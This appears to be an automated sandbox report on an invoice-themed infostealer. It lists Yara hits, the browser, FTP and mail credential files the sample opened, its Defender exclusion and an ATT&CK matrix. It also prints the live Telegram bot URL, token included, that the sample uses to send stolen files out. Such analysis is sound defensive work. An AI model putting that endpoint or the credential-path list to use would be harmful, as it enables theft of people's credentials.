                      Source: Yara match | File source: Process Memory Space: COMMERCIAL INVOICE - BL - AWB 7032805642.exe PID: 3648, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: AddInProcess32.exe PID: 7204, type: MEMORYSTR
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File opened: C:\FTP Navigator\Ftplist.txt
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                      Source: Yara match | File source: 0.2.COMMERCIAL INVOICE - BL - AWB 7032805642.exe.198756f1a78.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 4.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.COMMERCIAL INVOICE - BL - AWB 7032805642.exe.198757898c0.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.COMMERCIAL INVOICE - BL - AWB 7032805642.exe.1987578f8c4.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.COMMERCIAL INVOICE - BL - AWB 7032805642.exe.198756f1a78.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000004.00000002.2460982055.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000004.00000002.2464175604.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000002.1331684482.00000198756F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: COMMERCIAL INVOICE - BL - AWB 7032805642.exe PID: 3648, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: AddInProcess32.exe PID: 7204, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Source: Yara match | File source: sslproxydump.pcap, type: PCAP
                      Source: Yara match | File source: 0.2.COMMERCIAL INVOICE - BL - AWB 7032805642.exe.198756f1a78.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 4.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.COMMERCIAL INVOICE - BL - AWB 7032805642.exe.198757898c0.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.COMMERCIAL INVOICE - BL - AWB 7032805642.exe.1987578f8c4.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.COMMERCIAL INVOICE - BL - AWB 7032805642.exe.198756f1a78.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000004.00000002.2464175604.0000000002C3E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000004.00000002.2464175604.0000000002C5A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000004.00000002.2460982055.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000004.00000002.2464175604.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000002.1331684482.00000198756F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: COMMERCIAL INVOICE - BL - AWB 7032805642.exe PID: 3648, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: AddInProcess32.exe PID: 7204, type: MEMORYSTR
                      Source: Yara match | File source: 0.2.COMMERCIAL INVOICE - BL - AWB 7032805642.exe.198756f1a78.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 4.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.COMMERCIAL INVOICE - BL - AWB 7032805642.exe.198757898c0.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.COMMERCIAL INVOICE - BL - AWB 7032805642.exe.1987578f8c4.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.COMMERCIAL INVOICE - BL - AWB 7032805642.exe.198756f1a78.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000004.00000002.2460982055.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000004.00000002.2464175604.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000002.1331684482.00000198756F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: COMMERCIAL INVOICE - BL - AWB 7032805642.exe PID: 3648, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: AddInProcess32.exe PID: 7204, type: MEMORYSTR
                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                      Windows Management Instrumentation
                      1
                      DLL Side-Loading
                      211
                      Process Injection
                      21
                      Disable or Modify Tools
                      2
                      OS Credential Dumping
                      231
                      Security Software Discovery
                      Remote Services1
                      Email Collection
                      1
                      Web Service
                      Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts1
                      Native API
                      Boot or Logon Initialization Scripts1
                      DLL Side-Loading
                      151
                      Virtualization/Sandbox Evasion
                      1
                      Input Capture
                      1
                      Process Discovery
                      Remote Desktop Protocol1
                      Input Capture
                      11
                      Encrypted Channel
                      Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)211
                      Process Injection
                      1
                      Credentials in Registry
                      151
                      Virtualization/Sandbox Evasion
                      SMB/Windows Admin Shares11
                      Archive Collected Data
                      2
                      Non-Application Layer Protocol
                      Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                      Deobfuscate/Decode Files or Information
                      NTDS1
                      Application Window Discovery
                      Distributed Component Object Model2
                      Data from Local System
                      3
                      Application Layer Protocol
                      Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      Obfuscated Files or Information
                      LSA Secrets1
                      File and Directory Discovery
                      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      Timestomp
                      Cached Domain Credentials24
                      System Information Discovery
                      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                      DLL Side-Loading
                      DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
Behavior Graph ID: 1446730
Sample: COMMERCIAL INVOICE - BL - A...
Startdate: 23/05/2024
Architecture: WINDOWS
Score: 100

Behavior graph (flattened; the numbers after a process name are the graph counters shown in the legend):

• Sample-level signatures: Snort IDS alert for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 12 other signatures
• DNS/IP node: api.telegram.org 149.154.167.220, 443, 49711 TELEGRAMRU United Kingdom
  Signature: Uses the Telegram API (likely for C&C communication)
• Process: COMMERCIAL INVOICE - BL - AWB 7032805642.exe (1 3), started
  Signatures: Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); Writes to foreign memory regions; Adds a directory exclusion to Windows Defender; 2 other signatures
  Started: AddInProcess32.exe (15 2); powershell.exe (23); WerFault.exe (19 16); AddInProcess32.exe
• Process: AddInProcess32.exe (15 2)
  Network: api.telegram.org 149.154.167.220, 443, 49711 TELEGRAMRU United Kingdom
  Signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Tries to steal Mail credentials (via file / registry access); 2 other signatures
• Process: powershell.exe (23)
  Signature: Loading BitLocker PowerShell Module
  Started: conhost.exe

Source | Detection | Scanner | Label | Link
COMMERCIAL INVOICE - BL - AWB 7032805642.exe | 50% | ReversingLabs | ByteCode-MSIL.Trojan.Injuke |
COMMERCIAL INVOICE - BL - AWB 7032805642.exe | 100% | Avira | TR/AD.GenSteal.ctcnj |
                      No Antivirus matches
                      No Antivirus matches
                      No Antivirus matches
Source | Detection | Scanner | Label | Link
http://upx.sf.net | 0% | URL Reputation | safe |
https://account.dyn.com/ | 0% | URL Reputation | safe |
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe |
http://api.telegram.org | 0% | Avira URL Cloud | safe |
https://api.telegram.org | 0% | Avira URL Cloud | safe |
https://www.google.ru/ | 0% | Avira URL Cloud | safe |
https://api.telegram.org/bot6521856051:AAE_VqJACYh8GJnmBCYkrp8n7Ax0fW5fJ5s/sendDocument | 0% | Avira URL Cloud | safe |
https://api.telegram.org/bot6521856051:AAE_VqJACYh8GJnmBCYkrp8n7Ax0fW5fJ5s/ | 0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
api.telegram.org | 149.154.167.220 | true | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
https://api.telegram.org/bot6521856051:AAE_VqJACYh8GJnmBCYkrp8n7Ax0fW5fJ5s/sendDocument | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://api.telegram.org/bot6521856051:AAE_VqJACYh8GJnmBCYkrp8n7Ax0fW5fJ5s/ | COMMERCIAL INVOICE - BL - AWB 7032805642.exe, 00000000.00000002.1331684482.00000198756F1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000004.00000002.2464175604.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000004.00000002.2460982055.0000000000402000.00000040.00000400.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
http://upx.sf.net | Amcache.hve.8.dr | false | URL Reputation: safe | unknown
https://account.dyn.com/ | COMMERCIAL INVOICE - BL - AWB 7032805642.exe, 00000000.00000002.1331684482.00000198756F1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000004.00000002.2460982055.0000000000402000.00000040.00000400.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://api.telegram.org | AddInProcess32.exe, 00000004.00000002.2464175604.0000000002C46000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
http://api.telegram.org | AddInProcess32.exe, 00000004.00000002.2464175604.0000000002C5A000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | AddInProcess32.exe, 00000004.00000002.2464175604.0000000002C46000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.google.ru/ | COMMERCIAL INVOICE - BL - AWB 7032805642.exe | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
149.154.167.220 | api.telegram.org | United Kingdom | | 62041 | TELEGRAMRU | true
                        Joe Sandbox version:40.0.0 Tourmaline
                        Analysis ID:1446730
                        Start date and time:2024-05-23 20:21:08 +02:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 5m 46s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:21
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:COMMERCIAL INVOICE - BL - AWB 7032805642.exe
                        Detection:MAL
                        Classification:mal100.troj.spyw.expl.evad.winEXE@9/10@1/1
                        EGA Information:
                        • Successful, ratio: 50%
                        HCA Information:Failed
                        Cookbook Comments:
                        • Found application associated with file extension: .exe
                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, Sgrmuserer.exe, conhost.exe, svchost.exe
                        • Excluded IPs from analysis (whitelisted): 20.42.65.92
                        • Excluded domains from analysis (whitelisted): onedsblobprdeus17.eastus.cloudapp.azure.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                        • Execution Graph export aborted for target COMMERCIAL INVOICE - BL - AWB 7032805642.exe, PID 3648 because it is empty
                        • Not all processes where analyzed, report is missing behavior information
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                        • Report size getting too big, too many NtCreateKey calls found.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • Report size getting too big, too many NtSetInformationFile calls found.
                        • VT rate limit hit for: COMMERCIAL INVOICE - BL - AWB 7032805642.exe
Time | Type | Description
14:21:58 | API Interceptor | 21x Sleep call for process: powershell.exe modified
14:22:03 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
149.154.167.220 | Doc0781123608.exe | Get hash | malicious | AgentTesla, PureLog Stealer, XWorm | Browse |
| ordinul de cotatie.exe | Get hash | malicious | AgentTesla | Browse |
| SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe | Get hash | malicious | AsyncRAT, DcRat, StormKitty, VenomRAT | Browse |
| RFQ-101432620247fl#U00e2#U00aexslx.exe | Get hash | malicious | AgentTesla | Browse |
| QUOTATION SHEET_RFQ 564077 2024.5.17.exe | Get hash | malicious | AgentTesla | Browse |
| MSK203.exe | Get hash | malicious | GuLoader | Browse |
| New Voicemail Invoice 64746w .js | Get hash | malicious | WSHRAT | Browse |
| gtKVgxrJ22.exe | Get hash | malicious | Gurcu Stealer, WhiteSnake Stealer | Browse |
| Pg5dhIO92K.exe | Get hash | malicious | AgentTesla | Browse |
| Shipping Reference_AWB 703280542_INVOICE_PDF.exe | Get hash | malicious | AgentTesla | Browse |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
api.telegram.org | Doc0781123608.exe | Get hash | malicious | AgentTesla, PureLog Stealer, XWorm | Browse | 149.154.167.220
| ordinul de cotatie.exe | Get hash | malicious | AgentTesla | Browse | 149.154.167.220
| SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe | Get hash | malicious | AsyncRAT, DcRat, StormKitty, VenomRAT | Browse | 149.154.167.220
| RFQ-101432620247fl#U00e2#U00aexslx.exe | Get hash | malicious | AgentTesla | Browse | 149.154.167.220
| QUOTATION SHEET_RFQ 564077 2024.5.17.exe | Get hash | malicious | AgentTesla | Browse | 149.154.167.220
| MSK203.exe | Get hash | malicious | GuLoader | Browse | 149.154.167.220
| New Voicemail Invoice 64746w .js | Get hash | malicious | WSHRAT | Browse | 149.154.167.220
| gtKVgxrJ22.exe | Get hash | malicious | Gurcu Stealer, WhiteSnake Stealer | Browse | 149.154.167.220
| Pg5dhIO92K.exe | Get hash | malicious | AgentTesla | Browse | 149.154.167.220
| Shipping Reference_AWB 703280542_INVOICE_PDF.exe | Get hash | malicious | AgentTesla | Browse | 149.154.167.220
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
TELEGRAMRU | Doc0781123608.exe | Get hash | malicious | AgentTesla, PureLog Stealer, XWorm | Browse | 149.154.167.220
| ordinul de cotatie.exe | Get hash | malicious | AgentTesla | Browse | 149.154.167.220
| SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe | Get hash | malicious | AsyncRAT, DcRat, StormKitty, VenomRAT | Browse | 149.154.167.220
| http://enter-mantagalaxies.com/ | Get hash | malicious | Unknown | Browse | 149.154.167.99
| RFQ-101432620247fl#U00e2#U00aexslx.exe | Get hash | malicious | AgentTesla | Browse | 149.154.167.220
| QUOTATION SHEET_RFQ 564077 2024.5.17.exe | Get hash | malicious | AgentTesla | Browse | 149.154.167.220
| MSK203.exe | Get hash | malicious | GuLoader | Browse | 149.154.167.220
| New Voicemail Invoice 64746w .js | Get hash | malicious | WSHRAT | Browse | 149.154.167.220
| https://scandal-lucah-melayu-viral.group-telegram.my.id/ | Get hash | malicious | Unknown | Browse | 149.154.167.99
| https://danakaget.uniclodw.web.id/ | Get hash | malicious | Unknown | Browse | 149.154.164.13
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
3b5074b1b5d032e5620f69f9f700ff0e | kam.cmd | Get hash | malicious | GuLoader | Browse | 149.154.167.220
| Doc0781123608.exe | Get hash | malicious | AgentTesla, PureLog Stealer, XWorm | Browse | 149.154.167.220
| upload.vbs | Get hash | malicious | Unknown | Browse | 149.154.167.220
| upload.vbs | Get hash | malicious | GuLoader, XWorm | Browse | 149.154.167.220
| update.vbs | Get hash | malicious | GuLoader, XWorm | Browse | 149.154.167.220
| file.vbs | Get hash | malicious | GuLoader | Browse | 149.154.167.220
| windows.vbs | Get hash | malicious | AsyncRAT, GuLoader | Browse | 149.154.167.220
| https://atualizar-cmd.com/ | Get hash | malicious | Unknown | Browse | 149.154.167.220
| update.vbs | Get hash | malicious | Unknown | Browse | 149.154.167.220
| file.vbs | Get hash | malicious | Unknown | Browse | 149.154.167.220
                                            No context
                                            Process:C:\Windows\System32\WerFault.exe
                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):65536
                                            Entropy (8bit):1.1949028292640749
                                            Encrypted:false
                                            SSDEEP:192:Sa5jGTO4h50UnUlaWxeVSvibdzuiFCZ24lO83m:z94haUnUlaG8ZZzuiFCY4lO83m
                                            MD5:97E46A7EE87F27DE0F5460FD094A1CCB
                                            SHA1:90473DADC64A1856B80E24F2125F2174EC3F2E07
                                            SHA-256:0AA3AC33CA6B12A478E97D31F81C67BEECDE7AEA714371500AAC9782F606303B
                                            SHA-512:C3032F5040631F91BBC909F109B490601200E5C033035B5308CD5B2A9440CE317CAD961CDD965A63EE9B80DE19BB01046636C1856D29E24A9E6750AFDC0C5F0D
                                            Malicious:false
                                            Reputation:low
                                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.0.9.6.2.1.1.7.3.4.2.7.7.7.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.0.9.6.2.1.1.8.5.6.1.4.5.4.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.e.a.e.2.4.0.f.-.f.0.5.9.-.4.d.1.0.-.a.8.b.0.-.0.f.9.a.1.e.7.0.3.9.2.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.d.c.5.4.1.1.5.-.6.e.4.7.-.4.b.1.7.-.8.1.8.b.-.1.6.2.4.e.f.6.3.7.c.2.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.C.O.M.M.E.R.C.I.A.L. .I.N.V.O.I.C.E. .-. .B.L. .-. .A.W.B. .7.0.3.2.8.0.5.6.4.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.E.p.e.c.e.l.o.v.e.c.a.c.o.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.e.4.0.-.0.0.0.1.-.0.0.1.3.-.0.2.2.1.-.7.8.1.5.3.e.a.d.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.2.2.d.3.4.c.8.5.b.5.d.7.3.7.c.2.a.0.c.e.f.d.4.3.7.4.7.c.f.2.8.1.0.0.0.0.0.0.0.0.!.0.0.0.0.2.3.8.0.a.c.b.c.5.4.6.4.2.8.8.2.a.4.a.3.
                                            Process:C:\Windows\System32\WerFault.exe
                                            File Type:Mini DuMP crash report, 16 streams, Thu May 23 18:21:57 2024, 0x1205a4 type
                                            Category:dropped
                                            Size (bytes):513401
                                            Entropy (8bit):3.3632220076962374
                                            Encrypted:false
                                            SSDEEP:3072:GqTCqfY1sN3DF5Q1CCqztC3+v1yBfn4Mg0s94Ml0iFN6McSlxb+:GqTCqb3OqztC3Q1yBfG1w2N64zS
                                            MD5:F3225F564E5BB3417A7D0FD58B9C0BE3
                                            SHA1:0E223A084CDFC9C0464CE409EA5500D7B78ABF5A
                                            SHA-256:998E578ECF36497D81AE13C63763882C8A8F8A5D58DB0B48272B82892112EFC2
                                            SHA-512:2EC9796E3CEDB2015D17F0834E692413EDABE75F96386EF19CE407B4F3A6D7EDAB14EA654ED53D771A83AD5794CE299B7E0F8DE797A762442F16072787A36A0B
                                            Malicious:false
                                            Reputation:low
                                            Preview:MDMP..a..... .......E.Of............t...........H...........$....%.......3...&.......p..............l.......8...........T............8...............Y...........[..............................................................................eJ......L\......Lw......................T.......@...@.Of.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................
                                            Process:C:\Windows\System32\WerFault.exe
                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):8728
                                            Entropy (8bit):3.7201212898070066
                                            Encrypted:false
                                            SSDEEP:192:R6l7wVeJ85d6YWwP1jgmfvL5hprG89bty9fLvm:R6lXJqd6YRP1jgmfvL5jt4fK
                                            MD5:519749FD56AA47F17C8BF02768C8E0C7
                                            SHA1:D23C799031AF3ADBBAC21ECD88A4402CBF476A6A
                                            SHA-256:711D48444CAFB672F9ED819BCA008269AD4DC389FAE244773F66ED17B0C077E9
                                            SHA-512:FFBF2EB9CB95370C4CD11EBBA69C636AD3C130C78437EB988859604B6AA0FF676D4751C5B48E56F60449C5048D7DAE57D84312E37811EF09E61380DE43182C3D
                                            Malicious:false
                                            Reputation:low
                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.6.4.8.<./.P.i.
                                            Process:C:\Windows\System32\WerFault.exe
                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):4919
                                            Entropy (8bit):4.595747241326101
                                            Encrypted:false
                                            SSDEEP:48:cvIwWl8zs6Jg771I9PgVWpW8VY/PYm8M4JkivMivhnFMyq85Iiv4dpnRivfAEivY:uIjfII7sN7VfJkmMmMJmsTmfAEmfCd
                                            MD5:44A02D807E62D19DA8D3DAE9A3C27891
                                            SHA1:4B7ABE17135BF39851CB7ED6AFD8355F8EEF686F
                                            SHA-256:5AEE942C9F562FC6644F288FC3431A1CA2FA3DBD8CC42A65106C42648618C5C3
                                            SHA-512:EEE84A20F3C3DE62B23A36CA5A60366BC4E977B4742DC40C6380ECC13A568087E9931A05790692841D0394671F5E5B14179DBC9480BD7A30DC1EBBE0DCCAA908
                                            Malicious:false
                                            Reputation:low
                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="336084" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):64
                                            Entropy (8bit):1.1940658735648508
                                            Encrypted:false
                                            SSDEEP:3:NlllulDm0ll//Z:NllU6cl/
                                            MD5:DA1F22117B9766A1F0220503765A5BA5
                                            SHA1:D35597157EFE03AA1A88C1834DF8040B3DD3F3CB
                                            SHA-256:BD022BFCBE39B4DA088DDE302258AE375AAFD6BDA4C7B39A97D80C8F92981C69
                                            SHA-512:520FA7879AB2A00C86D9982BB057E7D5E243F7FC15A12BA1C823901DC582D2444C76534E955413B0310B9EBD043400907FD412B88927DAD07A1278D3B667E3D9
                                            Malicious:false
                                            Reputation:moderate, very likely benign file
                                            Preview:@...e.................................R..............@..........
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
